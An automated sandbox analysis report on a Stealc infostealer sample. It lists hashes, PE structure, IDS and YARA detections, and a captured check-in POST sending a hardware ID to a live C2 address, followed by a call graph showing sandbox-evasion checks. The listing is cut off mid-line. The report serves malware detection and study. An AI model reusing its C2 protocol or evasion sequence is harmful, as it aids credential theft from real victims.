                              MD5:0537afac70b6fbc5a47749caf7565b78
                              SHA1:8ec7e7c48823c50e4c4ee6b6cd5c007ef964cad8
                              SHA256:cc1ee7d61921fed5338f55fc6e9a0661cb78fb562e54280aec23be3adca5e73a
                              SHA512:46ed5fb954dfc82e3fcd6f383c25fd00426bbecd74741f1ee9372fa14918f7e98df66bedea7c7bcccbbad49d271c1f0b1453702d0fc5b93343661589e408e89a
                              SSDEEP:49152:JkdEavK+krwYpd8pjbfdGKG0R3KAGuR/pe:6dEwoyFbfIKJR3Kmpe
                              TLSH:FE85336C7BB3A6C4CB65B2B37C9E557035F01A32C2179B7676073271A88BD02BC87529
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa8c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F99A0EC00FAh

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x16200ff7365a02014434647a8680df189ff4cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x2b00x20060d4d22fda84ac7f44237f9bcf19e7b4False0.796875data5.985954989706685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2a40000x20019905168d5807e1708e69a9d5eb2c143unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              lfcefhqr0x4f00000x19b0000x19a80058b6d75a1e730a39533e50850581f776False0.9947995965286236data7.955184799443045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              phkznexg0x68b0000x10000x400a748ff23e53de737c7e80491faa7aa09False0.7509765625data6.021106902035921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68c0000x30000x2200ec0a4b666dd863c7a2acc81aef5ea47aFalse0.06996783088235294DOS executable (COM)0.7773783630874334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x68a4f40x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-23T14:47:16.566594+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749702185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 23, 2024 14:47:14.498503923 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:14.622200966 CET8049702185.215.113.206192.168.2.7
                              Nov 23, 2024 14:47:14.622581005 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:14.623301029 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:14.749747992 CET8049702185.215.113.206192.168.2.7
                              Nov 23, 2024 14:47:16.068548918 CET8049702185.215.113.206192.168.2.7
                              Nov 23, 2024 14:47:16.068670988 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:16.098375082 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:16.218127012 CET8049702185.215.113.206192.168.2.7
                              Nov 23, 2024 14:47:16.566523075 CET8049702185.215.113.206192.168.2.7
                              Nov 23, 2024 14:47:16.566593885 CET4970280192.168.2.7185.215.113.206
                              Nov 23, 2024 14:47:19.342802048 CET4970280192.168.2.7185.215.113.206

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749702185.215.113.206807404C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 23, 2024 14:47:14.623301029 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 23, 2024 14:47:16.068548918 CET203INHTTP/1.1 200 OK
                              Date: Sat, 23 Nov 2024 13:47:15 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 23, 2024 14:47:16.098375082 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a
                              Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="hwid"6137C250D41F1622379703------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build"mars------BKEHDGDGHCBGCAKFIIIE--
                              Nov 23, 2024 14:47:16.566523075 CET210INHTTP/1.1 200 OK
                              Date: Sat, 23 Nov 2024 13:47:16 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:47:10
                              Start date:23/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x9b0000
                              File size:1'787'392 bytes
                              MD5 hash:0537AFAC70B6FBC5A47749CAF7565B78
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.7%
                                Total number of Nodes:1361
                                Total number of Limit Nodes:28
                                execution_graph 25803 9d1bf0 25855 9b2a90 25803->25855 25807 9d1c03 25808 9d1c29 lstrcpy 25807->25808 25809 9d1c35 25807->25809 25808->25809 25810 9d1c6d GetSystemInfo 25809->25810 25811 9d1c65 ExitProcess 25809->25811 25812 9d1c7d ExitProcess 25810->25812 25813 9d1c85 25810->25813 25956 9b1030 GetCurrentProcess VirtualAllocExNuma 25813->25956 25818 9d1cb8 25968 9d2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25818->25968 25819 9d1ca2 25819->25818 25820 9d1cb0 ExitProcess 25819->25820 25822 9d1cbd 25823 9d1ce7 lstrlen 25822->25823 26177 9d2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25822->26177 25827 9d1cff 25823->25827 25825 9d1cd1 25825->25823 25830 9d1ce0 ExitProcess 25825->25830 25826 9d1d23 lstrlen 25828 9d1d39 25826->25828 25827->25826 25829 9d1d13 lstrcpy lstrcat 25827->25829 25831 9d1d5a 25828->25831 25832 9d1d46 lstrcpy lstrcat 25828->25832 25829->25826 25833 9d2ad0 3 API calls 25831->25833 25832->25831 25834 9d1d5f lstrlen 25833->25834 25837 9d1d74 25834->25837 25835 9d1d9a lstrlen 25836 9d1db0 25835->25836 25839 9d1dce 25836->25839 25840 9d1dba lstrcpy lstrcat 25836->25840 25837->25835 25838 9d1d87 lstrcpy lstrcat 25837->25838 25838->25835 25970 9d2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25839->25970 25840->25839 25842 9d1dd3 lstrlen 25843 9d1de7 25842->25843 25844 9d1df7 lstrcpy lstrcat 25843->25844 25845 9d1e0a 25843->25845 25844->25845 25846 9d1e28 lstrcpy 25845->25846 25847 9d1e30 25845->25847 25846->25847 25848 9d1e56 OpenEventA 25847->25848 25849 9d1e8c CreateEventA 25848->25849 25850 9d1e68 CloseHandle Sleep OpenEventA 25848->25850 25971 9d1b20 GetSystemTime 25849->25971 25850->25849 25850->25850 25854 9d1ea5 CloseHandle ExitProcess 26178 9b4a60 25855->26178 25857 9b2aa1 25858 9b4a60 2 API calls 25857->25858 25859 9b2ab7 25858->25859 25860 9b4a60 2 API calls 25859->25860 25861 9b2acd 25860->25861 25862 9b4a60 2 API calls 25861->25862 25863 9b2ae3 25862->25863 25864 9b4a60 2 API calls 25863->25864 25865 9b2af9 25864->25865 25866 9b4a60 2 API calls 25865->25866 25867 9b2b0f 25866->25867 25868 9b4a60 2 API calls 25867->25868 25869 9b2b28 25868->25869 25870 9b4a60 2 API calls 25869->25870 25871 9b2b3e 25870->25871 25872 9b4a60 2 API calls 25871->25872 25873 9b2b54 25872->25873 25874 9b4a60 2 API calls 25873->25874 25875 9b2b6a 25874->25875 25876 9b4a60 2 API calls 25875->25876 25877 9b2b80 25876->25877 25878 9b4a60 2 API calls 25877->25878 25879 9b2b96 25878->25879 25880 9b4a60 2 API calls 25879->25880 25881 9b2baf 25880->25881 25882 9b4a60 2 API calls 25881->25882 25883 9b2bc5 25882->25883 25884 9b4a60 2 API calls 25883->25884 25885 9b2bdb 25884->25885 25886 9b4a60 2 API calls 25885->25886 25887 9b2bf1 25886->25887 25888 9b4a60 2 API calls 25887->25888 25889 9b2c07 25888->25889 25890 9b4a60 2 API calls 25889->25890 25891 9b2c1d 25890->25891 25892 9b4a60 2 API calls 25891->25892 25893 9b2c36 25892->25893 25894 9b4a60 2 API calls 25893->25894 25895 9b2c4c 25894->25895 25896 9b4a60 2 API calls 25895->25896 25897 9b2c62 25896->25897 25898 9b4a60 2 API calls 25897->25898 25899 9b2c78 25898->25899 25900 9b4a60 2 API calls 25899->25900 25901 9b2c8e 25900->25901 25902 9b4a60 2 API calls 25901->25902 25903 9b2ca4 25902->25903 25904 9b4a60 2 API calls 25903->25904 25905 9b2cbd 25904->25905 25906 9b4a60 2 API calls 25905->25906 25907 9b2cd3 25906->25907 25908 9b4a60 2 API calls 25907->25908 25909 9b2ce9 25908->25909 25910 9b4a60 2 API calls 25909->25910 25911 9b2cff 25910->25911 25912 9b4a60 2 API calls 25911->25912 25913 9b2d15 25912->25913 25914 9b4a60 2 API calls 25913->25914 25915 9b2d2b 25914->25915 25916 9b4a60 2 API calls 25915->25916 25917 9b2d44 25916->25917 25918 9b4a60 2 API calls 25917->25918 25919 9b2d5a 25918->25919 25920 9b4a60 2 API calls 25919->25920 25921 9b2d70 25920->25921 25922 9b4a60 2 API calls 25921->25922 25923 9b2d86 25922->25923 25924 9b4a60 2 API calls 25923->25924 25925 9b2d9c 25924->25925 25926 9b4a60 2 API calls 25925->25926 25927 9b2db2 25926->25927 25928 9b4a60 2 API calls 25927->25928 25929 9b2dcb 25928->25929 25930 9b4a60 2 API calls 25929->25930 25931 9b2de1 25930->25931 25932 9b4a60 2 API calls 25931->25932 25933 9b2df7 25932->25933 25934 9b4a60 2 API calls 25933->25934 25935 9b2e0d 25934->25935 25936 9b4a60 2 API calls 25935->25936 25937 9b2e23 25936->25937 25938 9b4a60 2 API calls 25937->25938 25939 9b2e39 25938->25939 25940 9b4a60 2 API calls 25939->25940 25941 9b2e52 25940->25941 25942 9d6390 GetPEB 25941->25942 25943 9d65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25942->25943 25944 9d63c3 25942->25944 25945 9d6638 25943->25945 25946 9d6625 GetProcAddress 25943->25946 25951 9d63d7 20 API calls 25944->25951 25947 9d666c 25945->25947 25948 9d6641 GetProcAddress GetProcAddress 25945->25948 25946->25945 25949 9d6688 25947->25949 25950 9d6675 GetProcAddress 25947->25950 25948->25947 25952 9d66a4 25949->25952 25953 9d6691 GetProcAddress 25949->25953 25950->25949 25951->25943 25954 9d66ad GetProcAddress GetProcAddress 25952->25954 25955 9d66d7 25952->25955 25953->25952 25954->25955 25955->25807 25957 9b105e VirtualAlloc 25956->25957 25958 9b1057 ExitProcess 25956->25958 25959 9b107d 25957->25959 25960 9b108a VirtualFree 25959->25960 25961 9b10b1 25959->25961 25960->25961 25962 9b10c0 25961->25962 25963 9b10d0 GlobalMemoryStatusEx 25962->25963 25965 9b1112 ExitProcess 25963->25965 25966 9b10f5 25963->25966 25966->25965 25967 9b111a GetUserDefaultLangID 25966->25967 25967->25818 25967->25819 25969 9d2b24 25968->25969 25969->25822 25970->25842 26183 9d1820 25971->26183 25973 9d1b81 sscanf 26222 9b2a20 25973->26222 25976 9d1be9 25979 9cffd0 25976->25979 25977 9d1bd6 25977->25976 25978 9d1be2 ExitProcess 25977->25978 25980 9cffe0 25979->25980 25981 9d000d lstrcpy 25980->25981 25982 9d0019 lstrlen 25980->25982 25981->25982 25983 9d00d0 25982->25983 25984 9d00db lstrcpy 25983->25984 25985 9d00e7 lstrlen 25983->25985 25984->25985 25986 9d00ff 25985->25986 25987 9d010a lstrcpy 25986->25987 25988 9d0116 lstrlen 25986->25988 25987->25988 25989 9d012e 25988->25989 25990 9d0139 lstrcpy 25989->25990 25991 9d0145 25989->25991 25990->25991 26224 9d1570 25991->26224 25994 9d016e 25995 9d018f lstrlen 25994->25995 25996 9d0183 lstrcpy 25994->25996 25997 9d01a8 25995->25997 25996->25995 25998 9d01bd lstrcpy 25997->25998 25999 9d01c9 lstrlen 25997->25999 25998->25999 26000 9d01e8 25999->26000 26001 9d020c lstrlen 26000->26001 26002 9d0200 lstrcpy 26000->26002 26003 9d026a 26001->26003 26002->26001 26004 9d0282 lstrcpy 26003->26004 26005 9d028e 26003->26005 26004->26005 26234 9b2e70 26005->26234 26013 9d0540 26014 9d1570 4 API calls 26013->26014 26015 9d054f 26014->26015 26016 9d05a1 lstrlen 26015->26016 26017 9d0599 lstrcpy 26015->26017 26018 9d05bf 26016->26018 26017->26016 26019 9d05d1 lstrcpy lstrcat 26018->26019 26020 9d05e9 26018->26020 26019->26020 26021 9d0614 26020->26021 26022 9d060c lstrcpy 26020->26022 26023 9d061b lstrlen 26021->26023 26022->26021 26024 9d0636 26023->26024 26025 9d064a lstrcpy lstrcat 26024->26025 26026 9d0662 26024->26026 26025->26026 26027 9d0687 26026->26027 26028 9d067f lstrcpy 26026->26028 26029 9d068e lstrlen 26027->26029 26028->26027 26030 9d06b3 26029->26030 26031 9d06c7 lstrcpy lstrcat 26030->26031 26032 9d06db 26030->26032 26031->26032 26033 9d0704 lstrcpy 26032->26033 26034 9d070c 26032->26034 26033->26034 26035 9d0749 lstrcpy 26034->26035 26036 9d0751 26034->26036 26035->26036 26990 9d2740 GetWindowsDirectoryA 26036->26990 26038 9d0785 26999 9b4c50 26038->26999 26039 9d075d 26039->26038 26040 9d077d lstrcpy 26039->26040 26040->26038 26042 9d078f 27153 9c8ca0 StrCmpCA 26042->27153 26044 9d079b 26045 9b1530 8 API calls 26044->26045 26046 9d07bc 26045->26046 26047 9d07ed 26046->26047 26048 9d07e5 lstrcpy 26046->26048 27171 9b60d0 80 API calls 26047->27171 26048->26047 26050 9d07fa 27172 9c81b0 10 API calls 26050->27172 26052 9d0809 26053 9b1530 8 API calls 26052->26053 26054 9d082f 26053->26054 26055 9d085e 26054->26055 26056 9d0856 lstrcpy 26054->26056 27173 9b60d0 80 API calls 26055->27173 26056->26055 26058 9d086b 27174 9c7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26058->27174 26060 9d0876 26061 9b1530 8 API calls 26060->26061 26062 9d08a1 26061->26062 26063 9d08c9 lstrcpy 26062->26063 26064 9d08d5 26062->26064 26063->26064 27175 9b60d0 80 API calls 26064->27175 26066 9d08db 27176 9c8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26066->27176 26068 9d08e6 26069 9b1530 8 API calls 26068->26069 26070 9d08f7 26069->26070 26071 9d092e 26070->26071 26072 9d0926 lstrcpy 26070->26072 27177 9b5640 8 API calls 26071->27177 26072->26071 26074 9d0933 26075 9b1530 8 API calls 26074->26075 26076 9d094c 26075->26076 27178 9c7280 1499 API calls 26076->27178 26078 9d099f 26079 9b1530 8 API calls 26078->26079 26080 9d09cf 26079->26080 26081 9d09fe 26080->26081 26082 9d09f6 lstrcpy 26080->26082 27179 9b60d0 80 API calls 26081->27179 26082->26081 26084 9d0a0b 27180 9c83e0 7 API calls 26084->27180 26086 9d0a18 26087 9b1530 8 API calls 26086->26087 26088 9d0a29 26087->26088 27181 9b24e0 230 API calls 26088->27181 26090 9d0a6b 26091 9d0a7f 26090->26091 26092 9d0b40 26090->26092 26093 9b1530 8 API calls 26091->26093 26094 9b1530 8 API calls 26092->26094 26095 9d0aa5 26093->26095 26096 9d0b59 26094->26096 26099 9d0acc lstrcpy 26095->26099 26100 9d0ad4 26095->26100 26097 9d0b87 26096->26097 26101 9d0b7f lstrcpy 26096->26101 27185 9b60d0 80 API calls 26097->27185 26099->26100 27182 9b60d0 80 API calls 26100->27182 26101->26097 26103 9d0b8d 27186 9cc840 70 API calls 26103->27186 26104 9d0ada 27183 9c85b0 47 API calls 26104->27183 26107 9d0b38 26110 9d0bd1 26107->26110 26113 9b1530 8 API calls 26107->26113 26108 9d0ae5 26109 9b1530 8 API calls 26108->26109 26112 9d0af6 26109->26112 26111 9d0bfa 26110->26111 26114 9b1530 8 API calls 26110->26114 26115 9d0c23 26111->26115 26119 9b1530 8 API calls 26111->26119 27184 9cd0f0 118 API calls 26112->27184 26117 9d0bb9 26113->26117 26118 9d0bf5 26114->26118 26121 9d0c4c 26115->26121 26126 9b1530 8 API calls 26115->26126 27187 9cd7b0 104 API calls 26117->27187 27189 9cdfa0 149 API calls 26118->27189 26124 9d0c1e 26119->26124 26122 9d0c75 26121->26122 26127 9b1530 8 API calls 26121->26127 26128 9d0c9e 26122->26128 26133 9b1530 8 API calls 26122->26133 27190 9ce500 108 API calls 26124->27190 26125 9d0bbe 26130 9b1530 8 API calls 26125->26130 26131 9d0c47 26126->26131 26132 9d0c70 26127->26132 26135 9d0cc7 26128->26135 26141 9b1530 8 API calls 26128->26141 26134 9d0bcc 26130->26134 27191 9ce720 120 API calls 26131->27191 27192 9ce9e0 110 API calls 26132->27192 26139 9d0c99 26133->26139 27188 9cecb0 98 API calls 26134->27188 26137 9d0cf0 26135->26137 26143 9b1530 8 API calls 26135->26143 26144 9d0dca 26137->26144 26145 9d0d04 26137->26145 27193 9b7bc0 152 API calls 26139->27193 26142 9d0cc2 26141->26142 27194 9ceb70 108 API calls 26142->27194 26148 9d0ceb 26143->26148 26150 9b1530 8 API calls 26144->26150 26149 9b1530 8 API calls 26145->26149 27195 9d41e0 91 API calls 26148->27195 26152 9d0d2a 26149->26152 26153 9d0de3 26150->26153 26155 9d0d5e 26152->26155 26156 9d0d56 lstrcpy 26152->26156 26154 9d0e11 26153->26154 26157 9d0e09 lstrcpy 26153->26157 27199 9b60d0 80 API calls 26154->27199 27196 9b60d0 80 API calls 26155->27196 26156->26155 26157->26154 26160 9d0e17 27200 9cc840 70 API calls 26160->27200 26161 9d0d64 27197 9c85b0 47 API calls 26161->27197 26164 9d0dc2 26167 9b1530 8 API calls 26164->26167 26165 9d0d6f 26166 9b1530 8 API calls 26165->26166 26168 9d0d80 26166->26168 26170 9d0e39 26167->26170 27198 9cd0f0 118 API calls 26168->27198 26171 9d0e67 26170->26171 26173 9d0e5f lstrcpy 26170->26173 27201 9b60d0 80 API calls 26171->27201 26173->26171 26174 9d0e74 26176 9d0e95 26174->26176 27202 9d1660 12 API calls 26174->27202 26176->25854 26177->25825 26179 9b4a76 RtlAllocateHeap 26178->26179 26182 9b4ab4 VirtualProtect 26179->26182 26182->25857 26184 9d182e 26183->26184 26185 9d1849 lstrcpy 26184->26185 26186 9d1855 lstrlen 26184->26186 26185->26186 26187 9d1873 26186->26187 26188 9d1885 lstrcpy lstrcat 26187->26188 26189 9d1898 26187->26189 26188->26189 26190 9d18c7 26189->26190 26191 9d18bf lstrcpy 26189->26191 26192 9d18ce lstrlen 26190->26192 26191->26190 26193 9d18e6 26192->26193 26194 9d18f2 lstrcpy lstrcat 26193->26194 26195 9d1906 26193->26195 26194->26195 26196 9d1935 26195->26196 26197 9d192d lstrcpy 26195->26197 26198 9d193c lstrlen 26196->26198 26197->26196 26199 9d1958 26198->26199 26200 9d196a lstrcpy lstrcat 26199->26200 26201 9d197d 26199->26201 26200->26201 26202 9d19ac 26201->26202 26203 9d19a4 lstrcpy 26201->26203 26204 9d19b3 lstrlen 26202->26204 26203->26202 26205 9d19cb 26204->26205 26206 9d19d7 lstrcpy lstrcat 26205->26206 26207 9d19eb 26205->26207 26206->26207 26208 9d1a1a 26207->26208 26209 9d1a12 lstrcpy 26207->26209 26210 9d1a21 lstrlen 26208->26210 26209->26208 26211 9d1a3d 26210->26211 26212 9d1a4f lstrcpy lstrcat 26211->26212 26213 9d1a62 26211->26213 26212->26213 26214 9d1a91 26213->26214 26215 9d1a89 lstrcpy 26213->26215 26216 9d1a98 lstrlen 26214->26216 26215->26214 26217 9d1ab4 26216->26217 26218 9d1ac6 lstrcpy lstrcat 26217->26218 26219 9d1ad9 26217->26219 26218->26219 26220 9d1b08 26219->26220 26221 9d1b00 lstrcpy 26219->26221 26220->25973 26221->26220 26223 9b2a24 SystemTimeToFileTime SystemTimeToFileTime 26222->26223 26223->25976 26223->25977 26225 9d157f 26224->26225 26226 9d159f lstrcpy 26225->26226 26227 9d15a7 26225->26227 26226->26227 26228 9d15d7 lstrcpy 26227->26228 26229 9d15df 26227->26229 26228->26229 26230 9d160f lstrcpy 26229->26230 26232 9d1617 26229->26232 26230->26232 26231 9d0155 lstrlen 26231->25994 26232->26231 26233 9d1647 lstrcpy 26232->26233 26233->26231 26235 9b4a60 2 API calls 26234->26235 26236 9b2e82 26235->26236 26237 9b4a60 2 API calls 26236->26237 26238 9b2ea0 26237->26238 26239 9b4a60 2 API calls 26238->26239 26240 9b2eb6 26239->26240 26241 9b4a60 2 API calls 26240->26241 26242 9b2ecb 26241->26242 26243 9b4a60 2 API calls 26242->26243 26244 9b2eec 26243->26244 26245 9b4a60 2 API calls 26244->26245 26246 9b2f01 26245->26246 26247 9b4a60 2 API calls 26246->26247 26248 9b2f19 26247->26248 26249 9b4a60 2 API calls 26248->26249 26250 9b2f3a 26249->26250 26251 9b4a60 2 API calls 26250->26251 26252 9b2f4f 26251->26252 26253 9b4a60 2 API calls 26252->26253 26254 9b2f65 26253->26254 26255 9b4a60 2 API calls 26254->26255 26256 9b2f7b 26255->26256 26257 9b4a60 2 API calls 26256->26257 26258 9b2f91 26257->26258 26259 9b4a60 2 API calls 26258->26259 26260 9b2faa 26259->26260 26261 9b4a60 2 API calls 26260->26261 26262 9b2fc0 26261->26262 26263 9b4a60 2 API calls 26262->26263 26264 9b2fd6 26263->26264 26265 9b4a60 2 API calls 26264->26265 26266 9b2fec 26265->26266 26267 9b4a60 2 API calls 26266->26267 26268 9b3002 26267->26268 26269 9b4a60 2 API calls 26268->26269 26270 9b3018 26269->26270 26271 9b4a60 2 API calls 26270->26271 26272 9b3031 26271->26272 26273 9b4a60 2 API calls 26272->26273 26274 9b3047 26273->26274 26275 9b4a60 2 API calls 26274->26275 26276 9b305d 26275->26276 26277 9b4a60 2 API calls 26276->26277 26278 9b3073 26277->26278 26279 9b4a60 2 API calls 26278->26279 26280 9b3089 26279->26280 26281 9b4a60 2 API calls 26280->26281 26282 9b309f 26281->26282 26283 9b4a60 2 API calls 26282->26283 26284 9b30b8 26283->26284 26285 9b4a60 2 API calls 26284->26285 26286 9b30ce 26285->26286 26287 9b4a60 2 API calls 26286->26287 26288 9b30e4 26287->26288 26289 9b4a60 2 API calls 26288->26289 26290 9b30fa 26289->26290 26291 9b4a60 2 API calls 26290->26291 26292 9b3110 26291->26292 26293 9b4a60 2 API calls 26292->26293 26294 9b3126 26293->26294 26295 9b4a60 2 API calls 26294->26295 26296 9b313f 26295->26296 26297 9b4a60 2 API calls 26296->26297 26298 9b3155 26297->26298 26299 9b4a60 2 API calls 26298->26299 26300 9b316b 26299->26300 26301 9b4a60 2 API calls 26300->26301 26302 9b3181 26301->26302 26303 9b4a60 2 API calls 26302->26303 26304 9b3197 26303->26304 26305 9b4a60 2 API calls 26304->26305 26306 9b31ad 26305->26306 26307 9b4a60 2 API calls 26306->26307 26308 9b31c6 26307->26308 26309 9b4a60 2 API calls 26308->26309 26310 9b31dc 26309->26310 26311 9b4a60 2 API calls 26310->26311 26312 9b31f2 26311->26312 26313 9b4a60 2 API calls 26312->26313 26314 9b3208 26313->26314 26315 9b4a60 2 API calls 26314->26315 26316 9b321e 26315->26316 26317 9b4a60 2 API calls 26316->26317 26318 9b3234 26317->26318 26319 9b4a60 2 API calls 26318->26319 26320 9b324d 26319->26320 26321 9b4a60 2 API calls 26320->26321 26322 9b3263 26321->26322 26323 9b4a60 2 API calls 26322->26323 26324 9b3279 26323->26324 26325 9b4a60 2 API calls 26324->26325 26326 9b328f 26325->26326 26327 9b4a60 2 API calls 26326->26327 26328 9b32a5 26327->26328 26329 9b4a60 2 API calls 26328->26329 26330 9b32bb 26329->26330 26331 9b4a60 2 API calls 26330->26331 26332 9b32d4 26331->26332 26333 9b4a60 2 API calls 26332->26333 26334 9b32ea 26333->26334 26335 